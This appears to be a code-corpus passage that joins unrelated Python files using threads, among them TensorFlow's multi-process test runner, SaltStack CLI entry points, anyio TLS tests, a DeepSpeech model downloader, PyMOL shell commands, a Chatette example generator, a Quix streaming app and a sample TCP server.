'barrier is not defined. It is likely because you are calling '
'get_barrier() in the main process. get_barrier() can only be called '
'in the subprocesses.'
)
return _barrier
_manager = None
_manager_lock = threading.Lock()
def manager():
"""Returns the multiprocessing manager object for concurrency tools.
The manager object is useful as it controls a server process that holds
the python objects that can be shared across processes. This can be used
for parent-subprocess communication:
```python
manager = multi_process_runner.manager()
some_event_happening_in_subprocess = manager.Event()
mpr = multi_process_runner.MultiProcessRunner(fn, cluster_spec,
args=(some_event_happening_in_subprocess,))
mpr.start()
some_event_happening_in_subprocess.wait()
# Do something that only should after some event happens in subprocess.
```
Note that the user of multi_process_runner should not create additional
`multiprocessing.Manager()` objects; doing so can result in segfault in
some cases.
This method should only be called after multi_process_runner.test_main() is
called.
"""
_check_initialization()
global _manager
with _manager_lock:
if _manager is None:
_manager = multiprocessing.Manager()
return _manager
@tf_export('__internal__.distribute.multi_process_runner.test_main', v1=[])
def test_main():
"""Main function to be called within `__main__` of a test file.
Any test module that uses
`tf.__internal__.distribute.multi_process_runner.run()`
must call this instead of regular `test.main()` inside
`if __name__ == '__main__':` block, or an error will be raised when
`tf.__internal__.distribute.multi_process_runner.run()` is used. This method
takes
care of needed initialization for launching multiple subprocesses.
Example:
```python
class MyTestClass(tf.test.TestCase):
def testSomething(self):
# Testing code making use of
# `tf.__internal__.distribute.multi_process_runner.run()`.
if __name__ == '__main__':
tf.__internal__.distribute.multi_process_runner.test_main()
```
"""
# Inject tearDownModule() to shut down all pool runners. Active pool runners
# will block the program from exiting. This is necessary for global pool
# runners. We tried atexit in the past, and it doesn't work in some
# deployment.
old_tear_down_module = getattr(sys.modules['__main__'], 'tearDownModule',
None)
def tear_down_module():
_shutdown_all_pool_runners()
if old_tear_down_module is not None:
old_tear_down_module()
setattr(sys.modules['__main__'], 'tearDownModule', tear_down_module)
multi_process_lib.test_main()
|
scripts.py | # -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import time
import signal
import logging
import functools
import threading
import traceback
import signal
import functools
from random import randint
# Import salt libs
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def _handle_signals(client, signum, sigframe):
try:
# This raises AttributeError on Python 3.4 and 3.5 if there is no current exception.
# Ref: https://bugs.python.org/issue23003
trace = traceback.format_exc()
except AttributeError:
trace = ''
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
if signum == signal.SIGINT:
exit_msg = '\nExiting gracefully on Ctrl-c'
try:
jid = client.local_client.pub_data['jid']
exit_msg += (
'\n'
'This job\'s jid is: {0}\n'
'The minions may not have all finished running and any remaining '
'minions will return upon completion. To look up the return data '
'for this job later, run the following command:\n\n'
'salt-run jobs.lookup_jid {0}'.format(jid)
)
except (AttributeError, KeyError):
pass
else:
exit_msg = None
_handle_interrupt(
SystemExit(exit_msg),
Exception('\nExiting with hard crash on Ctrl-c'),
hardcrash, trace=trace)
def _install_signal_handlers(client):
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
def salt_master():
'''
Start the salt master.
'''
import salt.cli.daemons
master = salt.cli.daemons.Master()
master.start()
def minion_process():
'''
Start a minion process
'''
import salt.utils.platform
import salt.utils.process
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.process.appendproctitle('KeepAlive')
def handle_hup(manager, sig, frame):
manager.minion.reload()
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: small race issue where the parent PID could be replace
with another process with same PID!
'''
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.platform.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error('Minion process encountered exception: %s', exc)
os._exit(salt.defaults.exitcodes.EX_GENERIC)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
minion = salt.cli.daemons.Minion()
signal.signal(signal.SIGHUP,
functools.partial(handle_hup,
minion))
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
lock.acquire(blocking=True)
log.warning('Fatal functionality error caught by minion handler:\n', exc_info=True)
log.warning('** Restarting minion **')
delay = 60
if minion is not None and hasattr(minion, 'config'):
delay = minion.config.get('random_reauth_delay', 60)
delay = randint(1, delay)
log.info('waiting random_reauth_delay %ss', delay)
time.sleep(delay)
sys.exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
finally:
lock.acquire(blocking=True)
def salt_minion():
'''
Start the salt minion in a subprocess.
Auto restart minion on error.
'''
import signal
import salt.utils.platform
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.platform.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(pid, signum, sigframe): # pylint: disable=unused-argument
'''
Escalate the signal received to the multiprocessing process that
is actually running the minion
'''
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(signal.SIGTERM,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGINT,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGHUP,
functools.partial(escalate_signal_to_process,
process.pid))
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
# Process exited or was terminated. Since we're going to try to restart
# it, we MUST, reset signal handling to the previous handlers
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
sys.exit(process.exitcode)
# ontop of the random_reauth_delay already preformed
# delay extra to reduce flooding and free resources
# NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
'''
Start a proxy minion process
'''
import salt.cli.daemons
import salt.utils.platform
# salt_minion spawns this function in a new process
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replace
with another process with the same PID!
'''
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
proxyminion = None
status = salt.defaults.exitcodes.EX_OK
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.error('Proxy Minion failed to start: ', exc_info=True)
restart = True
# status is superfluous since the process will be restarted
status = salt.defaults.exitcodes.SALT_KEEPALIVE
except SystemExit as exc:
restart = False
status = exc.code
finally:
lock.acquire(blocking=True)
if restart is True:
log.warning('** Restarting proxy minion **')
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, 'config'):
delay = proxyminion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of %s seconds', random_delay)
# preform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
sys.exit(status)
def salt_proxy():
'''
Start a proxy minion.
'''
import salt.cli.daemons
import salt.utils.platform
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.platform.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception:
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception:
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
sys.exit(process.exitcode)
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
'''
Start the salt syndic.
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
'''
Manage the authentication keys with salt-key.
'''
import salt.cli.key
try:
client = salt.cli.key.SaltKey()
_install_signal_handlers(client)
client.run()
except Exception as err:
sys.stderr.write("Error: {0}\n".format(err))
def salt_cp():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.cp
client = salt.cli.cp.SaltCPCli()
_install_signal_handlers(client)
client.run()
def salt_call():
'''
Directly call a salt command in the modules, does not require a running
salt minion to run.
'''
import salt.cli.call
if '' in sys.path:
sys.path.remove('')
client = salt.cli.call.SaltCall()
_install_signal_handlers(client)
client.run()
def salt_run():
'''
Execute a salt convenience routine.
'''
import salt.cli.run
if '' in sys.path:
sys.path.remove('')
client = salt.cli.run.SaltRun()
_install_signal_handlers(client)
client.run()
def salt_ssh():
'''
Execute the salt-ssh system
'''
import salt.cli.ssh
if '' in sys.path:
sys.path.remove('')
try:
client = salt.cli.ssh.SaltSSH()
_install_signal_handlers(client)
client.run()
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit(err),
err,
hardcrash, trace=trace)
def salt_cloud():
'''
The main function for salt-cloud
'''
# Define 'salt' global so we may use it after ImportError. Otherwise,
# UnboundLocalError will be raised.
global salt # pylint: disable=W0602
try:
# Late-imports for CLI performance
import salt.cloud
import salt.cloud.cli
except ImportError as e:
# No salt cloud on Windows
log.error('Error importing salt cloud: %s', e)
print('salt-cloud is not available in this system')
sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)
if '' in sys.path:
sys.path.remove('')
client = salt.cloud.cli.SaltCloud()
_install_signal_handlers(client)
client.run()
def salt_api():
'''
The main function for salt-api
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.salt
if '' in sys.path:
sys.path.remove('')
client = salt.cli.salt.SaltCMD()
_install_signal_handlers(client)
client.run()
def salt_spm():
'''
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
def salt_extend(extension, name, description, salt_dir, merge):
'''
Quickstart for developing on the saltstack installation
.. versionadded:: 2016.11.0
'''
import salt.utils.extend
salt.utils.extend.run(extension=extension,
name=name,
description=description,
salt_dir=salt_dir,
merge=merge)
def salt_support():
'''
Run Salt Support that collects system data, logs etc for debug and support purposes.
:return:
'''
import salt.cli.support.collector
if '' in sys.path:
sys.path.remove('')
client = salt.cli.support.collector.SaltSupport()
_install_signal_handlers(client)
client.run()
|
test_tls.py | import socket
import ssl
from contextlib import ExitStack
from threading import Thread
import pytest
from anyio import BrokenResourceError, connect_tcp
from anyio.abc import SocketAttribute
from anyio.streams.tls import TLSAttribute, TLSStream
pytestmark = pytest.mark.anyio
class TestTLSStream:
async def test_send_receive(self, server_context, client_context):
def serve_sync():
conn, addr = server_sock.accept()
conn.settimeout(1)
data = conn.recv(10)
conn.send(data[::-1])
conn.close()
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=False)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
async with await connect_tcp(*server_sock.getsockname()) as stream:
wrapper = await TLSStream.wrap(stream, hostname='localhost',
ssl_context=client_context)
await wrapper.send(b'hello')
response = await wrapper.receive()
server_thread.join()
server_sock.close()
assert response == b'olleh'
async def test_extra_attributes(self, server_context, client_context):
def serve_sync():
conn, addr = server_sock.accept()
with conn:
conn.settimeout(1)
conn.recv(1)
server_context.set_alpn_protocols(['h2'])
client_context.set_alpn_protocols(['h2'])
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=True)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
async with await connect_tcp(*server_sock.getsockname()) as stream:
wrapper = await TLSStream.wrap(stream, hostname='localhost',
ssl_context=client_context, standard_compatible=False)
for name, attribute in SocketAttribute.__dict__.items():
if not name.startswith('_'):
assert wrapper.extra(attribute) == stream.extra(attribute)
assert wrapper.extra(TLSAttribute.alpn_protocol) == 'h2'
assert isinstance(wrapper.extra(TLSAttribute.channel_binding_tls_unique), bytes)
assert isinstance(wrapper.extra(TLSAttribute.cipher), tuple)
assert isinstance(wrapper.extra(TLSAttribute.peer_certificate), dict)
assert isinstance(wrapper.extra(TLSAttribute.peer_certificate_binary), bytes)
assert wrapper.extra(TLSAttribute.server_side) is False
assert isinstance(wrapper.extra(TLSAttribute.shared_ciphers), list)
assert isinstance(wrapper.extra(TLSAttribute.ssl_object), ssl.SSLObject)
assert wrapper.extra(TLSAttribute.standard_compatible) is False
assert wrapper.extra(TLSAttribute.tls_version).startswith('TLSv')
server_thread.join()
server_sock.close()
async def test_unwrap(self, server_context, client_context):
def serve_sync():
conn, addr = server_sock.accept()
conn.settimeout(1)
conn.send(b'encrypted')
unencrypted = conn.unwrap()
unencrypted.send(b'unencrypted')
unencrypted.close()
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=False)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
async with await connect_tcp(*server_sock.getsockname()) as stream:
wrapper = await TLSStream.wrap(stream, hostname='localhost',
ssl_context=client_context)
msg1 = await wrapper.receive()
stream, msg2 = await wrapper.unwrap()
if msg2 != b'unencrypted':
msg2 += await stream.receive()
server_thread.join()
server_sock.close()
assert msg1 == b'encrypted'
assert msg2 == b'unencrypted'
@pytest.mark.skipif(not ssl.HAS_ALPN, reason='ALPN support not available')
async def test_alpn_negotiation(self, server_context, client_context):
def serve_sync():
conn, addr = server_sock.accept()
conn.settimeout(1)
conn.send(conn.selected_alpn_protocol().encode())
conn.close()
server_context.set_alpn_protocols(['dummy1', 'dummy2'])
client_context.set_alpn_protocols(['dummy2', 'dummy3'])
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=False)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
async with await connect_tcp(*server_sock.getsockname()) as stream:
wrapper = await TLSStream.wrap(stream, hostname='localhost',
ssl_context=client_context)
assert wrapper.extra(TLSAttribute.alpn_protocol) == 'dummy2'
server_alpn_protocol = await wrapper.receive()
server_thread.join()
server_sock.close()
assert server_alpn_protocol == b'dummy2'
@pytest.mark.parametrize('server_compatible, client_compatible', [
pytest.param(True, True, id='both_standard'),
pytest.param(True, False, id='server_standard'),
pytest.param(False, True, id='client_standard'),
pytest.param(False, False, id='neither_standard')
])
async def test_ragged_eofs(self, server_context, client_context, server_compatible,
client_compatible):
def serve_sync():
nonlocal server_exc
conn, addr = server_sock.accept()
try:
conn.settimeout(1)
conn.sendall(b'hello')
if server_compatible:
conn.unwrap()
except BaseException as exc:
server_exc = exc
finally:
conn.close()
client_cm = ExitStack()
if client_compatible and not server_compatible:
client_cm = pytest.raises(BrokenResourceError)
server_exc = None
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=not server_compatible)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
stream = await connect_tcp(*server_sock.getsockname())
wrapper = await TLSStream.wrap(stream, hostname='localhost', ssl_context=client_context,
standard_compatible=client_compatible)
with client_cm:
assert await wrapper.receive() == b'hello'
await wrapper.aclose()
server_thread.join()
server_sock.close()
if not client_compatible and server_compatible:
assert isinstance(server_exc, OSError)
assert not isinstance(server_exc, socket.timeout)
else:
assert server_exc is None
|
installModels.py |
import os
import shutil
import threading
from pathlib import Path
import requests
from pydeepspeech.util import get_appdatadir
# AI model used for the application
_VERSION = 'v0.9.3'
_URLS = [
'https://itml.cl.indiana.edu/models/tr/output_graph.pbmm',
'https://itml.cl.indiana.edu/models/tr/kenlm.scorer',
]
MODEL_DIR = os.path.join(get_appdatadir(), 'model', _VERSION)
# Marks the model created.
IS_FINISHED_STAMP = os.path.join(MODEL_DIR, 'is_finished')
def download_file(url, outfile) -> None:
# NOTE the stream=True parameter below
try:
tmp = f'{outfile}.tmp'
if os.path.exists(tmp):
os.remove(tmp)
with requests.get(url, stream=True) as r:
r.raise_for_status()
with open(tmp, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
# If you have chunk encoded response uncomment if
# and set chunk_size parameter to None.
#if chunk:
f.write(chunk)
os.rename(tmp, outfile)
except KeyboardInterrupt:
print(f'Aborted download of {url}')
return
def url_to_local_name(url: str) -> str:
return os.path.join(MODEL_DIR, url.split('/')[-1])
def installModels() -> None:
os.makedirs(MODEL_DIR, exist_ok=True)
threads = {}
if os.path.exists(IS_FINISHED_STAMP):
return
print('Downloading and installing the models for the first time. This may take a while.')
for url in _URLS:
local_filename = url_to_local_name(url)
t = threading.Thread(
target=download_file, args=(url, local_filename))
print(f'Downloading {url} -> {local_filename}')
threads[url] = t
t.daemon = True
t.start()
for url, t in threads.items():
while t.is_alive(): # allows keyboard interrupt.
t.join(.2)
print(f'Finished downloading {url}')
Path(IS_FINISHED_STAMP).touch()
def installModelsIfNecessary() -> str:
print(f'Model directory is: {MODEL_DIR}')
installModels()
return MODEL_DIR
if __name__ == '__main__':
installModelsIfNecessary()
|
run_threads.py | """I start all the threads necessary to control the slave nodes and receive info from the backend
controller"""
from threading import Thread
from typing import Type
from .abstract import AbstractSetup, AbstractSlave
from .project_logger import set_up_logging
from .chain_controller_interface import start_controller_server
from .http_server import start_slave_server
from .meta_scenario import run_scenario
LOG = set_up_logging(__name__)
def orchestrate(port: int, slave_class: Type[AbstractSlave], setup=AbstractSetup()):
"""
"I run the orchestration of a scenario. Provide me with I port where I listen to the backend
Controller. I also need a Slave class that defines how to talk to the slaves. Additionally a
Setup object can be provided
:param port: Where I listen for input from the controller
:param slave_class: A Class which contains the implementation how to communicate with the slave
:param setup: An object that allows for additional setup of the blockchain if needed
:return:
"""
Thread(target=start_controller_server, args=[port]).start()
Thread(target=start_slave_server, args=[setup, slave_class]).start()
Thread(target=run_scenario, args=[]).start()
LOG.info('All threads started')
|
externing.py | #A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-*
#-*
#-*
#Z* -------------------------------------------------------------------
from __future__ import print_function
if __name__=='pymol.externing':
import os
import pymol
import string
from . import parsing
import threading
cmd = __import__("sys").modules["pymol.cmd"]
import traceback
from glob import glob
from .cmd import _cmd,lock,unlock,Shortcut,QuietException, \
_feedback,fb_module,fb_mask, exp_path, \
DEFAULT_ERROR, DEFAULT_SUCCESS, _raising, is_ok, is_error
def cd(dir="~",complain=1,quiet=1):
'''
DESCRIPTION
"cd" changes the current working directory.
USAGE
cd <path>
SEE ALSO
pwd, ls, system
'''
dir = exp_path(dir)
try:
os.chdir(dir) # raises on error
if not quiet:
print(" cd: now in %s"%os.getcwd())
except:
if complain:
traceback.print_exc()
return DEFAULT_SUCCESS
def pwd():
'''
DESCRIPTION
Print current working directory.
USAGE
pwd
SEE ALSO
cd, ls, system
'''
print(os.getcwd())
return DEFAULT_SUCCESS
def ls(pattern=None):
'''
DESCRIPTION
List contents of the current working directory.
USAGE
ls [pattern]
dir [pattern]
EXAMPLES
ls
ls *.pml
SEE ALSO
cd, pwd, system
'''
if pattern==None:
pattern = "*"
else:
pattern = exp_path(pattern)
if '*' not in pattern:
lst = glob(os.path.join(pattern, '*'))
else:
lst = []
if not len(lst):
lst = glob(pattern)
if len(lst):
lst.sort()
lst = parsing.list_to_str_list(lst)
for a in lst:
print(a)
else:
print(" ls: Nothing found. Is that a valid path?")
return DEFAULT_SUCCESS
def system(command,async=0,_self=cmd):
'''
DESCRIPTION
"system" executes a command in a subshell under Unix or Windows.
USAGE
system command
PYMOL API
cmd.system(string command,int async=0)
NOTES
async can only be specified from the Python level (not the command language)
if async is 0 (default), then the result code from "system" is returned in r
if async is 1, then the command is run in a separate thread whose object is
returned
SEE ALSO
ls, cd, pwd
'''
r = None
if async:
r = threading.Thread(target=_cmd.system,args=(str(command),1))
r.start()
else:
r = _cmd.system(_self._COb,str(command),0)
return r # special meaning
def paste(_self=cmd): # INTERNAL
r=DEFAULT_SUCCESS
lst = []
if hasattr(pymol,"machine_get_clipboard"):
lst = pymol.machine_get_clipboard()
if len(lst):
new_lst = []
for a in lst:
while len(a):
if ord(a[-1])>32:
break
else:
a=a[:-1]
# if nothing in the queue, this special string is printed; so
# we ignore it
if len(a):
if a=="""PRIMARY selection doesn't exist or form "STRING" not defined""":
new_list = []
else:
new_lst.append(a)
r = _cmd.paste(_self._COb,new_lst)
if _raising(r,_self): raise pymol.CmdException
return r
|
definition.py | import random
#from typing import List
from chatette_qiu.units import UnitDefinition#, Example
from .example import IntentExample
from threading import Thread
import time
class IntentDefinition(UnitDefinition):
"""
This class represents the definition of an intent,
containing all the rules it can generate from.
"""
def __init__(self, name, modifiers, rules=None):
super(IntentDefinition, self).__init__(name, modifiers, rules=rules)
self.type = "intent"
self.nb_training_examples_asked = None # All possibilities will be generated TODO
self.nb_testing_examples_asked = None
def set_nb_examples_asked(self, nb_training_examples_asked, nb_testing_examples_asked=None):
self.nb_training_examples_asked = nb_training_examples_asked
self.nb_testing_examples_asked = nb_testing_examples_asked
def generate_random(self, variation_name=None, arg_value=None):
example = \
super(IntentDefinition, self).generate_random(variation_name, arg_value)
tmp = IntentExample.from_example(self.name, example)
return tmp
def generate_all(self, variation_name=None, arg_value=None):
examples = \
super(IntentDefinition, self).generate_all(variation_name, arg_value)
return [IntentExample.from_example(self.name, ex) for ex in examples]
def generate(self, max_nb_examples, training_examples=None):# -> List[Example]:
"""
Generates all the examples that were asked (i.e. as much examples
as asked). The number of generated examples is tied to a maximum though TODO.
When `training_examples` is `None`, this will generate the training examples
(i.e. the number of training examples asked); otherwise, it will generate
examples that are not in `training_examples` (if possible).
"""
if training_examples is None and self.nb_training_examples_asked is None:
return [
IntentExample(self.name, ex.text.strip(), ex.entities)
for (i, ex) in enumerate(self.generate_all())
if i < max_nb_examples
]
nb_examples_asked = self.nb_training_examples_asked
if training_examples is not None:
if self.nb_testing_examples_asked is None:
return [] # No examples must be generated
nb_examples_asked = self.nb_testing_examples_asked
if nb_examples_asked <= 0:
return []
nb_possible_ex = self.get_max_nb_generated_examples()
if nb_examples_asked > nb_possible_ex:
if training_examples is None:
return [
IntentExample(self.name, ex.text.strip(), ex.entities)
for (i, ex) in enumerate(self.generate_all())
if i < max_nb_examples
]
all_examples = [
IntentExample(self.name, ex.text.strip(), ex.entities)
for (i, ex) in enumerate(self.generate_all())
if i < max_nb_examples
]
return [
ex
for ex in all_examples if ex not in training_examples
]
if nb_examples_asked > max_nb_examples:
nb_examples_asked = max_nb_examples
if nb_examples_asked < nb_possible_ex / 2: # QUESTION: should this be /2?
generated_examples = []
thread_list = []
def make_sample_item(i):
while len(generated_examples) < nb_examples_asked:
print("thread %s ,count generated_examples : %s" % (i,len(generated_examples)))
#nb_iterations = 0
#while nb_iterations < 50: # 50 is completely arbitrary
current_example = self.generate_random()
current_example.text = current_example.text.strip() # Strip for safety
#if (current_example not in generated_examples
# and (training_examples is None
# or current_example not in training_examples)):
generated_examples.append(
IntentExample(self.name, current_example.text,
current_example.entities))
#break
for i in range(30):
t = Thread(target=make_sample_item,args=(i,))
thread_list.append(t)
for t in thread_list:
t.start()
for t in thread_list:
t.join()
#for _ in range(nb_examples_asked):
# nb_iterations = 0
# while nb_iterations < 50: # 50 is completely arbitrary
# current_example = self.generate_random()
# current_example.text = current_example.text.strip() # Strip for safety
# if ( current_example not in generated_examples
# and (training_examples is None
# or current_example not in training_examples)):
# generated_examples.append(
# IntentExample(self.name, current_example.text,
# current_example.entities))
# break
# nb_iterations += 1
return generated_examples
all_examples = [
IntentExample(self.name, ex.text.strip(), ex.entities)
for ex in self.generate_all()
]
if training_examples is None:
return random.sample(all_examples, nb_examples_asked)
random.shuffle(all_examples)
return [
ex for ex in all_examples
if ex not in training_examples
]
def _get_template_decl(self, variation=None):
result = '%' + \
super(IntentDefinition, self)._get_template_decl(variation)
if self.nb_training_examples_asked is not None:
result += "(train:" + str(self.nb_training_examples_asked)
if self.nb_testing_examples_asked is not None:
result += ", test:" + str(self.nb_testing_examples_asked) + ')'
elif self.nb_testing_examples_asked is not None:
result += "(test:" + str(self.nb_testing_examples_asked) +')'
return result
def short_desc_str(self):
"""
Returns a str representing a short description of this unit description.
"""
desc = super(IntentDefinition, self).short_desc_str() + '\n'
if self.nb_training_examples_asked is None:
desc += "# training examples: all\n"
else:
desc += "# training examples: " + \
str(self.nb_training_examples_asked) + '\n'
if self.nb_testing_examples_asked is None:
desc += "# testing examples: all"
else:
desc += "# testing examples: " + str(self.nb_testing_examples_asked)
return desc
|
main.py | from quixstreaming import QuixStreamingClient
from quixstreaming.app import App
from quix_functions import QuixFunctions
from datetime import datetime, timezone
import traceback
from tfl_api import get_agg_bikepoint_data
from threading import Thread
import os
# should the main loop run?
run = True
# Quix injects credentials automatically to the client. Alternatively, you can always pass an SDK token manually as an argument.
client = QuixStreamingClient()
print("Opening output topic")
output_topic = client.open_output_topic(os.environ["output"])
# CREATE A STREAM
# A stream is a collection of data that belong to a single session of a single source.
# Initiate streams
output_stream = output_topic.create_stream("Available-Bikes")
# Give the stream human readable name. This name will appear in data catalogue.
output_stream.properties.name = "Available Bikes Location"
# Save stream in specific folder in data catalogue to help organize your workspace.
output_stream.properties.location = "/Bikes"
output_stream.parameters.buffer.buffer_timeout = 1000
output_stream.parameters.buffer.time_span_in_milliseconds = 1000
def get_data():
quix_functions = QuixFunctions(output_stream)
while run:
try:
# Current timestamp
current_time = datetime.now(timezone.utc)
# ToL API Request
df, df_agg = get_agg_bikepoint_data()
quix_functions.data_handler(df, current_time)
except Exception:
print(traceback.format_exc())
def before_shutdown():
global run
# Stop the main loop
run = False
def main():
thread = Thread(target=get_data)
thread.start()
App.run(before_shutdown=before_shutdown)
# wait for worker thread to end
thread.join()
print("Exiting")
if __name__ == "__main__":
main()
|
tcp_server.py | import socket, threading, time
"""Sample of TCP server"""
def handler(sock, addr):
print('[Server %s] accepted new connection.' % threading.current_thread().getName())
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if not data or data.decode('UTF-8') == 'exit':
break
sock.send(('Hello %s' % data.decode('UTF-8')).encode('UTF-8'))
sock.close()
print('[Server %s] closed connection.' % threading.current_thread().getName())
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 9999))
s.listen(10)
print('[Server] began to listen.')
while True:
sock, addr = s.accept()
t = threading.Thread(target=handler, args=(sock, addr))
t.start()
|
test_holdup.py | import os
import socket
import ssl
import threading
import pytest
try:
from inspect import getfullargspec as getargspec
except ImportError:
from inspect import getargspec
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
pytest_plugins = 'pytester',
def urlopen_has_ssl_context():
if hasattr(ssl, 'create_default_context'):
urlopen_argspec = getargspec(urlopen)
urlopen_args = urlopen_argspec.args
if hasattr(urlopen_argspec, 'kwonlyargs'):
urlopen_args.extend(urlopen_argspec.kwonlyargs)
if 'context' in urlopen_args:
return False
else:
return True
else:
return True
